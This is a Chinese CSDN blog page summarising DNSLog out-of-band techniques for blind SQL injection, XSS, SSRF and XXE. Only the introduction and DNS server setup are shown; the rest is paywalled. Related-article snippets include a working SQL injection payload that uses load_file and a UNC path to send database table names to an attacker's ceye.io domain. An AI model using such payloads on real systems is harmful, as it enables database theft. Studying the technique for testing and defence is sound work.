DNSLog 盲注总结

最新推荐文章于 2024-05-12 11:46:14 发布
最新推荐文章于 2024-05-12 11:46:14 发布
阅读量501 收藏
点赞数 1
分类专栏: 渗透与攻防 数据库漏洞 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/127525471
版权

目录

前言:

(一)DNSLog部署过程

(二)命令执行

(三)SQL

UNC路径

(四)XSS

 绕过CSP

举个栗子

(五)SSRF

 (六)XXE

(七)模板注入

参考资料

前言:

总所周知,我们输入的域名需要通过DNS服务器进行解析得到IP地址才能通过IP访问网站,DNSLog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问的信息,类似日志文件。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。

漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)__Cyber的博客-CSDN博客_kali扫描xss

(一)DNSLog部署过程

  1. 申请一个域名,如 xie.com
  2. 在我们的VPS上安装并配置DNS服务器
  3. 将 xie.com 的DNS服务器设置为我们的VPS地址

这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。

了解本专栏 订阅专栏 解锁全文 超级会员免费看
@Camelus
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1772
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
dnslog server
09-08
DNSlog Server是一个专门用于DNS日志记录和分析的工具,主要应用于网络安全领域,特别是渗透测试和应急响应。在本文中,我们将深入探讨DNSlog Server的工作原理、用途以及如何利用它来提升网络安全。 **DNSlog ...
DNSlog注入(利用DNSlog平台将SQL盲注变成回显注入)
柠檬i的博客
08-07 1226
DNSlog注入是一种利用DNS服务器记录域名解析请求的特性,来获取SQL注入结果的技术。它的原理是通过构造一个包含数据库信息的子域名,然后使用MySQL的load_file函数或其他方法,让目标服务器向DNS服务器发起解析请求,从而在DNS服务器上留下注入结果的痕迹。
DNSlog漏洞探测_服务器访问dnslog服务器是代表有漏洞吗
最新发布
2401_84973011的博客
05-12 903
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
SQL注入学习-Dnslog盲注
笑花大王
02-17 666
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
dnslog盲注
qq_50854662的博客
07-14 893
dnslog盲注dnslog注入原理DNSlog工具什么情况下使用dnslog注入?Mysql DNSlog原理图DNSlog盲注利用条件DNSlog盲注操作方式实战演练查询当前数据库名:查询当前数据库的第一个表名:查询第users表一个列名:查询users表的username列的数据:需要注意的点: dnslog注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问
DNSlog盲注
weixin_42478365的博客
03-08 104
原因(该方法只适合在windows服务器上) 案例: 根据数据库查表: http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.hzaskx.ceye.io\\abc'))--+ #### 根据表查字段
dnslog在sql盲注
CvtNhso的博客
01-31 458
相当于请求了一个UNC的地址就是这样一个数据\\user().kysngm.dnslog.cn这个主机下的/abc这个共享文件夹虽然不存在但是无所谓我们的目的是需要将user()数据获取,它会将数据解析到我们使用的dnslog.cn中它可以记录解析后的数据。可以进到my.ini文件中将secure_file_priv的值从null改为""secure_file_priv为null,load_file则不能加载文件。secure_file_priv为路径,可以读取路径中的文件;
DNSLog-Platform-Golang:DNSLOG平台golang一键启动版
04-02
DNSLog-平台-Golang相信DNSLog平台已经是安全从业者的标配。而公开的DNSLOG平台域名早已进入流量监控设备的规则库。同时也有重大问题值得关注。于是撸了(凑了)一个一键建造Dnslog平台的golang版本。可以使用其一键...
无回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
dnslog:简约的 DNS 日志记录工具
05-31
捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192....
DNSlog-GO:DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口
03-08
简介DNSLog-GO是一种golang编写的监控DNS解析记录的工具,自带WEB接口安装详细图文教程: : 1.获取发行版这里下载最新发行版,并解压2.域名与公网IP准备搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS ...
7.Dnslog盲注
kinght的博客
08-26 233
title: 7.Dnslog盲注(mysql8不可用) date: 2020-08-10 14:05:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 什么是DNS?我们在进行网页浏览的时候,通常会输入一段URL,而我们访问服务器用的则是服务器的IP地址。从URL转换到IP地址,这个就是DNS的作用了 我们在配置网络的时候,都会配置DNS地址,浏览器或者应用访问URL,首先会去查找本地的hosts文件,如果没有,就会发送请求到D.
Web渗透测试之SQL注入:盲注特别篇--DNSlog盲注
vodkaDL的博客
11-16 445
文章目录前言DNSlog注入原理平台示例总结 前言   前两篇依次讲解了布尔盲注和时间盲注,二者本质上并无太大区别。但由于盲注本身的弊端导致在现代渗透测试进行盲注时二者难有用武之地,在盲注中真正发挥作用的是DNSlog盲注。因此本篇将会着重讲解DNSlog盲注DNSlog注入   在讲解布尔盲注时笔者提到过盲注的关键点就在于一个“盲”字,而产生“盲”的原因就在于页面无回显,这就导致了我们只能通过其它表征(如页面对错、时间差等)来不断猜解拼凑我们想要的信息。因此盲注本身的性质决定了如果进行手工盲注费时费力
编解码注入、二次注入、DNSlog盲注
leekos的博客,分享web安全相关知识~
12-06 755
编解码、二次注入、DNSlog盲注
dnslog盲注原理
qq_50854662的博客
01-21 251
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试在终端运行curl dnslog.4ke30o.ceye.io Mysql load_file()函
Dnslog盲注(时间盲注)less-9-10
01mx的博客
03-26 430
Dnslog注入原理 代码虽然存在sql注入,然而页面不会回显数据,也不会回显错误信息。 通过布尔注入,和时间盲注都可以获取到内容,但是整个过程效率低,需要发很多请求判断。可能会触发安全设备。 这里我们我们需要一种方式,减少请求,直接回显数据,这里可以使用dnslog注入 dnslog平台 http://ceye.io dns在解析是会留下日志,通过读取多级域名的解析日志,获取请求信息 知识扩展 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 secure_file_priv特性,有
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 5997
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
linux dnslog
08-10
- *1* *2* *3* [DNSlog平台各种利用姿势(盲注)](https://blog.csdn.net/weixin_30588427/article/details/114493929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值